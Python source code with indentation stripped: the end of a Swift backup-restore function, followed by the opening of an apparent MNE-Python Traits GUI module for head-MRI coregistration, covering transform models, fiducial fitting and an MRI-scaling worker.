# Arugment validation. Raise ValueError is all the arguments are not True
if not validate_all_args(required_list):
logging.critical("[*] Error: please provide ALL the following \
arguments: {0}".format(' '.join(required_list)))
raise ValueError
if not backup_opt_dict.restore_from_date:
logging.warning('[*] Restore date time not available. Setting to \
current datetime')
backup_opt_dict.restore_from_date = \
re.sub(
r'^(\S+?) (.+?:\d{,2})\.\d+?$', r'\1T\2',
str(datetime.datetime.now()))
# If restore_from_host is set to local hostname is not set in
# backup_opt_dict.restore_from_host
if backup_opt_dict.restore_from_host:
backup_opt_dict.hostname = backup_opt_dict.restore_from_host
# Check if there's a backup matching. If not raise Exception
backup_opt_dict = get_match_backup(backup_opt_dict)
if not backup_opt_dict.remote_match_backup:
logging.critical(
'[*] Not backup found matching with name: {0},\
hostname: {1}'.format(
backup_opt_dict.backup_name, backup_opt_dict.hostname))
raise ValueError
restore_fs_sort_obj(backup_opt_dict)
def restore_fs_sort_obj(backup_opt_dict):
'''
Take options dict as argument and sort/remove duplicate elements from
backup_opt_dict.remote_match_backup and find the closes backup to the
provided from backup_opt_dict.restore_from_date. Once the objects are
looped backwards and the level 0 backup is found, along with the other
level 1,2,n, is download the object from swift and untar them locally
starting from level 0 to level N.
'''
# Convert backup_opt_dict.restore_from_date to timestamp
fmt = '%Y-%m-%dT%H:%M:%S'
opt_backup_date = datetime.datetime.strptime(
backup_opt_dict.restore_from_date, fmt)
opt_backup_timestamp = int(time.mktime(opt_backup_date .timetuple()))
# Sort remote backup list using timestamp in reverse order,
# that is from the newest to the oldest executed backup
sorted_backups_list = sort_backup_list(backup_opt_dict)
# Get the closest earlier backup to date set in
# backup_opt_dict.restore_from_date
closest_backup_list = []
for backup_obj in sorted_backups_list:
if backup_obj.startswith('tar_metadata'):
continue
obj_name_match = re.search(
r'\S+?_{0}_(\d+)_(\d+?)$'.format(backup_opt_dict.backup_name),
backup_obj, re.I)
if not obj_name_match:
continue
# Ensure provided timestamp is bigger then object timestamp
if opt_backup_timestamp >= int(obj_name_match.group(1)):
closest_backup_list.append(backup_obj)
# If level 0 is reached, break the loop as level 0 is the first
# backup we want to restore
if int(obj_name_match.group(2)) == 0:
break
if not closest_backup_list:
logging.info('[*] No matching backup name {0} found in \
container {1} for hostname {2}'.format(
backup_opt_dict.backup_name, backup_opt_dict.container,
backup_opt_dict.hostname))
raise ValueError
# Backups are looped from the last element of the list going
# backwards, as we want to restore starting from the oldest object
for backup in closest_backup_list[::-1]:
write_pipe, read_pipe = Pipe()
process_stream = Process(
target=object_to_stream, args=(
backup_opt_dict, write_pipe, backup,))
process_stream.daemon = True
process_stream.start()
tar_stream = Process(
target=tar_restore, args=(backup_opt_dict, read_pipe,))
tar_stream.daemon = True
tar_stream.start()
process_stream.join()
tar_stream.join()
logging.info(
'[*] Restore execution successfully finished for backup name {0}, \
from container {1}, into directory {2}'.format(
backup_opt_dict.backup_name, backup_opt_dict.container,
backup_opt_dict.restore_abs_path))
logging.info(
'[*] Restore execution successfully executed for backup name {0}, \
from container {1}, into directory {2}'.format(
backup_opt_dict.backup_name, backup_opt_dict.container,
backup_opt_dict.restore_abs_path))
|
_coreg_gui.py | # -*- coding: utf-8 -*-
"""Traits-based GUI for head-MRI coregistration.
Hierarchy
---------
This is the hierarchy of classes for control. Brackets like [1] denote
properties that are set to be equivalent.
::
CoregFrame: GUI for head-MRI coregistration.
|-- CoregModel (model): Traits object for estimating the head mri transform.
| |-- MRIHeadWithFiducialsModel (mri) [1]: Represent an MRI head shape with fiducials.
| |-- MRISubjectSource (subject_source) [2]: Find subjects in SUBJECTS_DIR and select one.
| |-- SurfaceSource (bem): Expose points and tris of a file storing a surface.
| |-- FiducialsSource (fid): Expose points of a given fiducials fif file.
| +-- DigSource (hsp): Expose measurement information from a inst file.
|-- MlabSceneModel (scene) [3]: mayavi.core.ui.mayavi_scene
|-- HeadViewController (headview) [4]: Set head views for the given coordinate system.
| +-- MlabSceneModel (scene) [3*]: ``HeadViewController(scene=CoregFrame.scene)``
|-- SubjectSelectorPanel (subject_panel): Subject selector panel
| +-- MRISubjectSource (model) [2*]: ``SubjectSelectorPanel(model=self.model.mri.subject_source)``
|-- SurfaceObject (mri_obj) [5]: Represent a solid object in a mayavi scene.
|-- FiducialsPanel (fid_panel): Set fiducials on an MRI surface.
| |-- MRIHeadWithFiducialsModel (model) [1*]: ``FiducialsPanel(model=CoregFrame.model.mri, headview=CoregFrame.headview)``
| |-- HeadViewController (headview) [4*]: ``FiducialsPanel(model=CoregFrame.model.mri, headview=CoregFrame.headview)``
| +-- SurfaceObject (hsp_obj) [5*]: ``CoregFrame.fid_panel.hsp_obj = CoregFrame.mri_obj``
|-- CoregPanel (coreg_panel): Coregistration panel for Head<->MRI with scaling.
+-- PointObject ({hsp, eeg, lpa, nasion, rpa, hsp_lpa, hsp_nasion, hsp_rpa} + _obj): Represent a group of individual points in a mayavi scene.
""" # noqa: E501
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
import os
from ..externals.six.moves import queue
import re
from threading import Thread
import traceback
import warnings
import numpy as np
from scipy.spatial.distance import cdist
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import (error, confirm, OK, YES, NO, CANCEL, information,
FileDialog, GUI)
from traits.api import (Bool, Button, cached_property, DelegatesTo, Directory,
Enum, Float, HasTraits, HasPrivateTraits, Instance,
Int, on_trait_change, Property, Str)
from traitsui.api import (View, Item, Group, HGroup, VGroup, VGrid, EnumEditor,
Handler, Label, TextEditor, Spring, InstanceEditor)
from traitsui.menu import Action, UndoButton, CancelButton, NoButtons
from tvtk.pyface.scene_editor import SceneEditor
from ..bem import make_bem_solution, write_bem_solution
from ..coreg import bem_fname, trans_fname
from ..defaults import DEFAULTS
from ..transforms import (write_trans, read_trans, apply_trans, rotation,
translation, scaling, rotation_angles, Transform)
from ..coreg import (fit_matched_points, fit_point_cloud, scale_mri,
_find_fiducials_files, _point_cloud_error)
from ..viz._3d import _toggle_mlab_render
from ..utils import logger, set_config
from ._fiducials_gui import MRIHeadWithFiducialsModel, FiducialsPanel, _mm_fmt
from ._file_traits import trans_wildcard, DigSource, SubjectSelectorPanel
from ._viewer import HeadViewController, PointObject, SurfaceObject
defaults = DEFAULTS['coreg']
laggy_float_editor = TextEditor(auto_set=False, enter_set=True, evaluate=float,
format_func=_mm_fmt)
class CoregModel(HasPrivateTraits):
"""Traits object for estimating the head mri transform.
Notes
-----
Transform from head to mri space is modelled with the following steps:
* move the head shape to its nasion position
* rotate the head shape with user defined rotation around its nasion
* move the head shape by user defined translation
* move the head shape origin to the mri nasion
If MRI scaling is enabled,
* the MRI is scaled relative to its origin center (prior to any
transformation of the digitizer head)
Don't sync transforms to anything to prevent them from being recomputed
upon every parameter change.
"""
# data sources
mri = Instance(MRIHeadWithFiducialsModel, ())
hsp = Instance(DigSource, ())
# parameters
guess_mri_subject = Bool(True) # change MRI subject when dig file changes
grow_hair = Float(label="Grow Hair [mm]", desc="Move the back of the MRI "
"head outwards to compensate for hair on the digitizer "
"head shape")
n_scale_params = Enum(0, 1, 3, desc="Scale the MRI to better fit the "
"subject's head shape (a new MRI subject will be "
"created with a name specified upon saving)")
scale_x = Float(1, label="R (X)")
scale_y = Float(1, label="A (Y)")
scale_z = Float(1, label="S (Z)")
rot_x = Float(0, label="R (X)")
rot_y = Float(0, label="A (Y)")
rot_z = Float(0, label="S (Z)")
trans_x = Float(0, label="R (X)")
trans_y = Float(0, label="A (Y)")
trans_z = Float(0, label="S (Z)")
# options during scaling
scale_labels = Bool(True, desc="whether to scale *.label files")
copy_annot = Bool(True, desc="whether to copy *.annot files for scaled "
"subject")
prepare_bem_model = Bool(True, desc="whether to run mne_prepare_bem_model "
"after scaling the MRI")
# secondary to parameters
scale = Property(
depends_on=['n_scale_params', 'scale_x', 'scale_y', 'scale_z'])
has_fid_data = Property(
Bool,
desc="Required fiducials data is present.",
depends_on=['mri_origin', 'hsp.nasion'])
has_pts_data = Property(
Bool,
depends_on=['mri.points', 'hsp.points'])
has_eeg_data = Property(
Bool,
depends_on=['mri.points', 'hsp.eeg_points'])
# MRI dependent
mri_origin = Property(
desc="Coordinates of the scaled MRI's nasion.",
depends_on=['mri.nasion', 'scale'])
# target transforms
mri_scale_trans = Property(
depends_on=['scale'])
head_mri_trans = Property(
desc="Transformaiton of the head shape to match the scaled MRI.",
depends_on=['hsp.nasion', 'rot_x', 'rot_y', 'rot_z',
'trans_x', 'trans_y', 'trans_z', 'mri_origin'])
# info
subject_has_bem = DelegatesTo('mri')
lock_fiducials = DelegatesTo('mri')
can_prepare_bem_model = Property(
Bool,
depends_on=['n_scale_params', 'subject_has_bem'])
can_save = Property(Bool, depends_on=['head_mri_trans'])
raw_subject = Property(
desc="Subject guess based on the raw file name.",
depends_on=['hsp.inst_fname'])
# transformed geometry
processed_mri_points = Property(depends_on=['mri.points', 'grow_hair'])
transformed_mri_points = Property(
depends_on=['processed_mri_points', 'mri_scale_trans'])
transformed_hsp_points = Property(
depends_on=['hsp.points', 'head_mri_trans'])
transformed_mri_lpa = Property(
depends_on=['mri.lpa', 'mri_scale_trans'])
transformed_hsp_lpa = Property(depends_on=['hsp.lpa', 'head_mri_trans'])
transformed_mri_nasion = Property(
depends_on=['mri.nasion', 'mri_scale_trans'])
transformed_hsp_nasion = Property(
depends_on=['hsp.nasion', 'head_mri_trans'])
transformed_mri_rpa = Property(
depends_on=['mri.rpa', 'mri_scale_trans'])
transformed_hsp_rpa = Property(
depends_on=['hsp.rpa', 'head_mri_trans'])
# fit properties
lpa_distance = Property(
depends_on=['transformed_mri_lpa', 'transformed_hsp_lpa'])
nasion_distance = Property(
depends_on=['transformed_mri_nasion', 'transformed_hsp_nasion'])
rpa_distance = Property(
depends_on=['transformed_mri_rpa', 'transformed_hsp_rpa'])
point_distance = Property(
depends_on=['transformed_mri_points', 'transformed_hsp_points'])
# fit property info strings
fid_eval_str = Property(
depends_on=['lpa_distance', 'nasion_distance', 'rpa_distance'])
points_eval_str = Property(
depends_on=['point_distance'])
@cached_property
def _get_can_prepare_bem_model(self):
return self.subject_has_bem and self.n_scale_params > 0
@cached_property
def _get_can_save(self):
return np.any(self.head_mri_trans != np.eye(4))
@cached_property
def _get_has_pts_data(self):
has = (np.any(self.mri.points) and np.any(self.hsp.points))
return has
@cached_property
def _get_has_eeg_data(self):
has = (np.any(self.mri.points) and np.any(self.hsp.eeg_points))
return has
@cached_property
def _get_has_fid_data(self):
has = (np.any(self.mri_origin) and np.any(self.hsp.nasion))
return has
@cached_property
def _get_scale(self):
if self.n_scale_params == 0:
return np.array(1)
elif self.n_scale_params == 1:
return np.array(self.scale_x)
else: # if self.n_scale_params == 3:
return np.array([self.scale_x, self.scale_y, self.scale_z])
@cached_property
def _get_mri_scale_trans(self):
if self.scale.ndim == 0:
return scaling(self.scale, self.scale, self.scale)
else:
return scaling(*self.scale)
@cached_property
def _get_mri_origin(self):
return self.mri.nasion * self.scale
@cached_property
def _get_head_mri_trans(self):
if not self.has_fid_data:
return np.eye(4)
# move hsp so that its nasion becomes the origin
x, y, z = -self.hsp.nasion[0]
trans = translation(x, y, z)
# rotate hsp by rotation parameters
rot = rotation(self.rot_x, self.rot_y, self.rot_z)
trans = np.dot(rot, trans)
# move hsp by translation parameters
transl = translation(self.trans_x, self.trans_y, self.trans_z)
trans = np.dot(transl, trans)
# move the hsp origin(/nasion) to the MRI's nasion
x, y, z = self.mri_origin[0]
tgt_mri_trans = translation(x, y, z)
trans = np.dot(tgt_mri_trans, trans)
return trans
@cached_property
def _get_processed_mri_points(self):
if self.grow_hair:
if len(self.mri.norms):
scaled_hair_dist = self.grow_hair / (self.scale * 1000)
points = self.mri.points.copy()
hair = points[:, 2] > points[:, 1]
points[hair] += self.mri.norms[hair] * scaled_hair_dist
return points
else:
error(None, "Norms missing from bem, can't grow hair")
self.grow_hair = 0
return self.mri.points
@cached_property
def _get_transformed_mri_points(self):
points = apply_trans(self.mri_scale_trans,
self.processed_mri_points)
return points
@cached_property
def _get_transformed_mri_lpa(self):
return apply_trans(self.mri_scale_trans, self.mri.lpa)
@cached_property
def _get_transformed_mri_nasion(self):
return apply_trans(self.mri_scale_trans, self.mri.nasion)
@cached_property
def _get_transformed_mri_rpa(self):
return apply_trans(self.mri_scale_trans, self.mri.rpa)
@cached_property
def _get_transformed_hsp_points(self):
return apply_trans(self.head_mri_trans, self.hsp.points)
@cached_property
def _get_transformed_hsp_lpa(self):
return apply_trans(self.head_mri_trans, self.hsp.lpa)
@cached_property
def _get_transformed_hsp_nasion(self):
return apply_trans(self.head_mri_trans, self.hsp.nasion)
@cached_property
def _get_transformed_hsp_rpa(self):
return apply_trans(self.head_mri_trans, self.hsp.rpa)
@cached_property
def _get_lpa_distance(self):
d = np.ravel(self.transformed_mri_lpa - self.transformed_hsp_lpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_nasion_distance(self):
d = np.ravel(self.transformed_mri_nasion - self.transformed_hsp_nasion)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_rpa_distance(self):
d = np.ravel(self.transformed_mri_rpa - self.transformed_hsp_rpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_point_distance(self):
if (len(self.transformed_hsp_points) == 0 or
len(self.transformed_mri_points) == 0):
return
dists = cdist(self.transformed_hsp_points, self.transformed_mri_points,
'euclidean')
dists = np.min(dists, 1)
return dists
@cached_property
def _get_fid_eval_str(self):
d = (self.lpa_distance * 1000, self.nasion_distance * 1000,
self.rpa_distance * 1000)
return 'Error: LPA=%.1f NAS=%.1f RPA=%.1f mm' % d
@cached_property
def _get_points_eval_str(self):
if self.point_distance is None:
return ""
av_dist = 1000 * np.mean(self.point_distance)
std_dist = 1000 * np.std(self.point_distance)
return u"Points: μ=%.1f, σ=%.1f mm" % (av_dist, std_dist)
def _get_raw_subject(self):
# subject name guessed based on the inst file name
if '_' in self.hsp.inst_fname:
subject, _ = self.hsp.inst_fname.split('_', 1)
if subject:
return subject
@on_trait_change('raw_subject')
def _on_raw_subject_change(self, subject):
if self.guess_mri_subject:
if subject in self.mri.subject_source.subjects:
self.mri.subject = subject
elif 'fsaverage' in self.mri.subject_source.subjects:
self.mri.subject = 'fsaverage'
def omit_hsp_points(self, distance=0, reset=False):
"""Exclude head shape points that are far away from the MRI head.
Parameters
----------
distance : float
Exclude all points that are further away from the MRI head than
this distance. Previously excluded points are still excluded unless
reset=True is specified. A value of distance <= 0 excludes nothing.
reset : bool
Reset the filter before calculating new omission (default is
False).
"""
distance = float(distance)
if reset:
logger.info("Coregistration: Reset excluded head shape points")
with warnings.catch_warnings(record=True): # Traits None comp
self.hsp.points_filter = None
if distance <= 0:
return
# find the new filter
hsp_pts = self.transformed_hsp_points
mri_pts = self.transformed_mri_points
point_distance = _point_cloud_error(hsp_pts, mri_pts)
new_sub_filter = point_distance <= distance
n_excluded = np.sum(new_sub_filter == False) # noqa: E712
logger.info("Coregistration: Excluding %i head shape points with "
"distance >= %.3f m.", n_excluded, distance)
# combine the new filter with the previous filter
old_filter = self.hsp.points_filter
if old_filter is None:
new_filter = new_sub_filter
else:
new_filter = np.ones(len(self.hsp.raw_points), np.bool8)
new_filter[old_filter] = new_sub_filter
# set the filter
with warnings.catch_warnings(record=True): # comp to None in Traits
self.hsp.points_filter = new_filter
def fit_auricular_points(self):
"""Find rotation to fit LPA and RPA."""
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_matched_points(src_fid, tgt_fid, rotate=True,
translate=False, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = rot
def fit_fiducials(self):
"""Find rotation and translation to fit all 3 fiducials."""
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z)
est = fit_matched_points(src_fid, tgt_fid, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:]
def fit_hsp_points(self):
"""Find rotation to fit head shapes."""
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.processed_mri_points - self.mri.nasion
tgt_pts *= self.scale
tgt_pts -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_point_cloud(src_pts, tgt_pts, rotate=True, translate=False,
x0=x0)
self.rot_x, self.rot_y, self.rot_z = rot
def fit_scale_auricular_points(self):
"""Find rotation and MRI scaling based on LPA and RPA."""
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
x = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=False,
scale=1, x0=x0, out='params')
self.scale_x = 1. / x[3]
self.rot_x, self.rot_y, self.rot_z = x[:3]
def fit_scale_fiducials(self):
"""Find translation, rotation, scaling based on the three fiducials."""
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z, 1. / self.scale_x,)
est = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=True,
scale=1, x0=x0, out='params')
self.scale_x = 1. / est[6]
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:6]
def fit_scale_hsp_points(self):
"""Find MRI scaling and rotation to match head shape points."""
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.processed_mri_points - self.mri.nasion
if self.n_scale_params == 1:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=1, x0=x0)
self.scale_x = 1. / est[3]
else: # if self.n_scale_params == 3:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x,
1. / self.scale_y, 1. / self.scale_z)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=3, x0=x0)
self.scale_x, self.scale_y, self.scale_z = 1. / est[3:]
self.rot_x, self.rot_y, self.rot_z = est[:3]
def get_scaling_job(self, subject_to, skip_fiducials):
"""Find all arguments needed for the scaling worker."""
subjects_dir = self.mri.subjects_dir
subject_from = self.mri.subject
bem_names = []
if self.can_prepare_bem_model and self.prepare_bem_model:
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_from, name='(.+-bem)')
bem_dir, pattern = os.path.split(pattern)
for filename in os.listdir(bem_dir):
match = re.match(pattern, filename)
if match:
bem_names.append(match.group(1))
return (subjects_dir, subject_from, subject_to, self.scale,
skip_fiducials, self.scale_labels, self.copy_annot, bem_names)
def load_trans(self, fname):
"""Load the head-mri transform from a fif file.
Parameters
----------
fname : str
File path.
"""
info = read_trans(fname)
# XXX this should really ensure that its a head->MRI trans. We should
# add from/to logic inside read_trans, which can also then invert it
# if necessary. This can then be used in a number of places
# (maxwell_filter, forward, viz._3d, etc.)
head_mri_trans = info['trans']
self.set_trans(head_mri_trans)
def reset(self):
"""Reset all the parameters affecting the coregistration."""
self.reset_traits(('grow_hair', 'n_scaling_params', 'scale_x',
'scale_y', 'scale_z', 'rot_x', 'rot_y', 'rot_z',
'trans_x', 'trans_y', 'trans_z'))
def set_trans(self, head_mri_trans):
"""Set rotation and translation params from a transformation matrix.
Parameters
----------
head_mri_trans : array, shape (4, 4)
Transformation matrix from head to MRI space.
"""
x, y, z = -self.mri_origin[0]
mri_tgt_trans = translation(x, y, z)
head_tgt_trans = np.dot(mri_tgt_trans, head_mri_trans)
x, y, z = self.hsp.nasion[0]
src_hsp_trans = translation(x, y, z)
src_tgt_trans = np.dot(head_tgt_trans, src_hsp_trans)
rot_x, rot_y, rot_z = rotation_angles(src_tgt_trans[:3, :3])
x, y, z = src_tgt_trans[:3, 3]
self.rot_x = rot_x
self.rot_y = rot_y
self.rot_z = rot_z
self.trans_x = x
self.trans_y = y
self.trans_z = z
def save_trans(self, fname):
"""Save the head-mri transform as a fif file.
Parameters
----------
fname : str
Target file path.
"""
if not self.can_save:
raise RuntimeError("Not enough information for saving transform")
write_trans(fname, Transform('head', 'mri', self.head_mri_trans))
class CoregFrameHandler(Handler):
"""Check for unfinished processes before closing its window."""
def object_title_changed(self, info):
"""Set the title when it gets changed."""
info.ui.title = info.object.title
def close(self, info, is_ok):
"""Handle the close event."""
if info.object.queue.unfinished_tasks:
information(None, "Can not close the window while saving is still "
"in progress. Please wait until all MRIs are "
"processed.", "Saving Still in Progress")
return False
else:
# store configuration, but don't prevent from closing on error
try:
info.object.save_config()
except Exception as exc:
warnings.warn("Error saving GUI configuration:\n%s" % (exc,))
return True
def _make_view_coreg_panel(scrollable=False):
"""Generate View for CoregPanel."""
view = View(VGroup(Item('grow_hair', show_label=True),
Item('n_scale_params', label='MRI Scaling',
style='custom', show_label=True,
editor=EnumEditor(values={0: '1:None',
1: '2:Uniform',
3: '3:3-axis'},
cols=4)),
VGrid(Item('scale_x', editor=laggy_float_editor,
show_label=True, tooltip="Scale along "
"right-left axis",
enabled_when='n_scale_params > 0',
width=+50),
Item('scale_x_dec',
enabled_when='n_scale_params > 0',
width=-50),
Item('scale_x_inc',
enabled_when='n_scale_params > 0',
width=-50),
Item('scale_step', tooltip="Scaling step",
enabled_when='n_scale_params > 0',
width=+50),
Item('scale_y', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis", width=+50),
Item('scale_y_dec',
enabled_when='n_scale_params > 1',
width=-50),
Item('scale_y_inc',
enabled_when='n_scale_params > 1',
width=-50),
Label('(Step)', width=+50),
Item('scale_z', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis", width=+50),
Item('scale_z_dec',
enabled_when='n_scale_params > 1',
width=-50),
Item('scale_z_inc',
enabled_when='n_scale_params > 1',
width=-50),
show_labels=False, show_border=True,
label='Scaling', columns=4),
HGroup(Item('fits_hsp_points',
enabled_when='n_scale_params',
tooltip="Rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance from each digitizer point to the "
"closest MRI point"),
Item('fits_ap',
enabled_when='n_scale_params == 1',
tooltip="While leaving the nasion in "
"place, rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance of the two auricular points"),
Item('fits_fid',
enabled_when='n_scale_params == 1',
tooltip="Move and rotate the digitizer "
"head shape, and scale the MRI so as to "
"minimize the distance of the three "
"fiducials."),
show_labels=False),
VGrid(Item('trans_x', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"right-left axis", width=+50),
Item('trans_x_dec', width=-50),
Item('trans_x_inc', width=-50),
Item('trans_step', tooltip="Movement step",
width=+50),
Item('trans_y', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis", width=+50),
Item('trans_y_dec', width=-50),
Item('trans_y_inc', width=-50),
Label('(Step)', width=+50),
Item('trans_z', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis", width=+50),
Item('trans_z_dec', width=-50),
Item('trans_z_inc', width=-50),
show_labels=False, show_border=True,
label='Translation', columns=4),
VGrid(Item('rot_x', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"right-left axis", width=+50),
Item('rot_x_dec', width=-50),
Item('rot_x_inc', width=-50),
Item('rot_step', tooltip="Rotation step",
width=+50),
Item('rot_y', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis", width=+50),
Item('rot_y_dec', width=-50),
Item('rot_y_inc', width=-50),
Label('(Step)', width=+50),
Item('rot_z', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis", width=+50),
Item('rot_z_dec', width=-50),
Item('rot_z_inc', width=-50),
show_labels=False, show_border=True,
label='Rotation', columns=4),
# buttons
HGroup(Item('fit_hsp_points',
enabled_when='has_pts_data',
tooltip="Rotate the head shape (around the "
"nasion) so as to minimize the distance "
"from each head shape point to its closest "
"MRI point", width=10),
Item('fit_ap', enabled_when='has_fid_data',
tooltip="Try to match the LPA and the RPA, "
"leaving the Nasion in place", width=10),
Item('fit_fid', enabled_when='has_fid_data',
tooltip="Move and rotate the head shape so "
"as to minimize the distance between the "
"MRI and head shape fiducials", width=10),
show_labels=False),
HGroup(Item('load_trans', width=10),
Spring(), show_labels=False),
'_',
Item('fid_eval_str', style='readonly'),
Item('points_eval_str', style='readonly'),
'_',
VGroup(
Item('scale_labels',
label="Scale *.label files",
enabled_when='n_scale_params > 0'),
Item('copy_annot',
label="Copy annotation files",
enabled_when='n_scale_params > 0'),
Item('prepare_bem_model',
label="Run mne_prepare_bem_model",
enabled_when='can_prepare_bem_model'),
show_left=False,
label='Scaling options',
show_border=True),
'_',
HGroup(Item('save', enabled_when='can_save',
tooltip="Save the trans file and (if "
"scaling is enabled) the scaled MRI"),
Item('reset_params', tooltip="Reset all "
"coregistration parameters"),
show_labels=False),
Item('queue_feedback', style='readonly'),
Item('queue_current', style='readonly'),
Item('queue_len_str', style='readonly'),
show_labels=False),
kind='panel', buttons=[UndoButton], scrollable=scrollable)
return view
class CoregPanel(HasPrivateTraits):
"""Coregistration panel for Head<->MRI with scaling."""
model = Instance(CoregModel)
# parameters
reset_params = Button(label='Reset')
grow_hair = DelegatesTo('model')
n_scale_params = DelegatesTo('model')
scale_step = Float(0.01)
scale_x = DelegatesTo('model')
scale_x_dec = Button('-')
scale_x_inc = Button('+')
scale_y = DelegatesTo('model')
scale_y_dec = Button('-')
scale_y_inc = Button('+')
scale_z = DelegatesTo('model')
scale_z_dec = Button('-')
scale_z_inc = Button('+')
rot_step = Float(0.01)
rot_x = DelegatesTo('model')
rot_x_dec = Button('-')
rot_x_inc = Button('+')
rot_y = DelegatesTo('model')
rot_y_dec = Button('-')
rot_y_inc = Button('+')
rot_z = DelegatesTo('model')
rot_z_dec = Button('-')
rot_z_inc = Button('+')
trans_step = Float(0.001)
trans_x = DelegatesTo('model')
trans_x_dec = Button('-')
trans_x_inc = Button('+')
trans_y = DelegatesTo('model')
trans_y_dec = Button('-')
trans_y_inc = Button('+')
trans_z = DelegatesTo('model')
trans_z_dec = Button('-')
trans_z_inc = Button('+')
# fitting
has_fid_data = DelegatesTo('model')
has_pts_data = DelegatesTo('model')
has_eeg_data = DelegatesTo('model')
# fitting with scaling
fits_hsp_points = Button(label='Fit Head Shape')
fits_fid = Button(label='Fit Fiducials')
fits_ap = Button(label='Fit LPA/RPA')
# fitting without scaling
fit_hsp_points = Button(label='Fit Head Shape')
fit_fid = Button(label='Fit Fiducials')
fit_ap = Button(label='Fit LPA/RPA')
# fit info
fid_eval_str = DelegatesTo('model')
points_eval_str = DelegatesTo('model')
# saving
can_prepare_bem_model = DelegatesTo('model')
can_save = DelegatesTo('model')
scale_labels = DelegatesTo('model')
copy_annot = DelegatesTo('model')
prepare_bem_model = DelegatesTo('model')
save = Button(label="Save As...")
load_trans = Button(label='Load trans...')
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_len_str = Property(Str, depends_on=['queue_len'])
view = _make_view_coreg_panel()
def __init__(self, *args, **kwargs): # noqa: D102
super(CoregPanel, self).__init__(*args, **kwargs)
# Setup scaling worker
def worker():
while True:
(subjects_dir, subject_from, subject_to, scale, skip_fiducials,
include_labels, include_annot, bem_names) = self.queue.get()
self.queue_len -= 1
# Scale MRI files
self.queue_current = 'Scaling %s...' % subject_to
try:
scale_mri(subject_from, subject_to, scale, True,
subjects_dir, skip_fiducials, include_labels,
include_annot)
except:
logger.error('Error scaling %s:\n' % subject_to +
traceback.format_exc())
self.queue_feedback = ('Error scaling %s (see Terminal)' %
subject_to)
bem_names = () # skip bem solutions
else:
self.queue_feedback = 'Done scaling %s.' % subject_to
# Precompute BEM solutions
for bem_name in bem_names:
self.queue_current = ('Computing %s solution...' %
bem_name)
try:
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to,
name=bem_name)
bemsol = make_bem_solution(bem_file)
write_bem_solution(bem_file[:-4] + '-sol.fif', bemsol)
except:
logger.error('Error computing %s solution:\n' %
bem_name + traceback.format_exc())
self.queue_feedback = ('Error computing %s solution '
'(see Terminal)' % bem_name)
else:
self.queue_feedback = ('Done computing %s solution.' %
bem_name)
# Finalize
self.queue_current = ''
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
@cached_property
def _get_queue_len_str(self):
if self.queue_len:
return "Queue length: %i" % self.queue_len
else:
return ''
@cached_property
def _get_rotation(self):
rot = np.array([self.rot_x, self.rot_y, self.rot_z])
return rot
@cached_property
def _get_src_pts(self):
return self.hsp_pts - self.hsp_fid[0]
@cached_property
def _get_src_fid(self):
return self.hsp_fid - self.hsp_fid[0]
@cached_property
def _get_tgt_origin(self):
return self.mri_fid[0] * self.scale
@cached_property
